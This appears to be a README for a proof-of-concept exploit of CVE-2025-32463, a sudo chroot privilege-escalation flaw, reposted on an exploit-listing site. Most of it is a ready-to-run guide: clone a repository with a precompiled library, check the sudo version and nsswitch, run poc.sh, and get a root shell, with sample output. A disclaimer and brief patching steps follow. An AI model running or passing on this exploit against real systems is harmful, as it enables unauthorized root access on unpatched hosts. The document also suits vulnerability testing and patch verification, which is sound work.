Share
## https://sploitus.com/exploit?id=0A6143AF-0BE9-5F64-8629-036E2C1C725E
# CVE-2025-32463 โ€“ Sudo EoP Exploit (PoC) with precompiled library

This repository contains a proof-of-concept (PoC) exploit for **CVE-2025-32463**, a local privilege escalation vulnerability in `sudo` discovered by Rich Mirch.

## Credit
https://github.com/kh4sh3i/CVE-2025-32463

## โš ๏ธ Disclaimer

This PoC is for **educational and authorized testing purposes only**. Do not use this code on systems you do not own or have explicit permission to assess.

---

## ๐Ÿ”ง Requirements

- sudo with chroot support (-R): version 1.9.14 to 1.9.17
- [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch) enabled

## ๐Ÿš€ How to run the POC

    git clone https://github.com/zinzloun/CVE-2025-32463.git
    cd CVE-2025-32463
Check if the current user has low privileges

    :~/CVE-2025-32463$ id
    uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Check requirements

    :~/CVE-2025-32463$ sudo --version
    Sudo version 1.9.15p5
    ...
    :~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
    -rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Run the exploit
        
    :~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
    woot!
    root@ubutes01:/# id
    uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

## ๐Ÿš’ Remediation on Ubuntu 24.04 LTS
- For connected systems just run

      sudo apt update && sudo apt upgrade
- For air gapped systems: you can obtain the last sudo package from here: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Once the package has been transfered to the target system, just run:

       sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb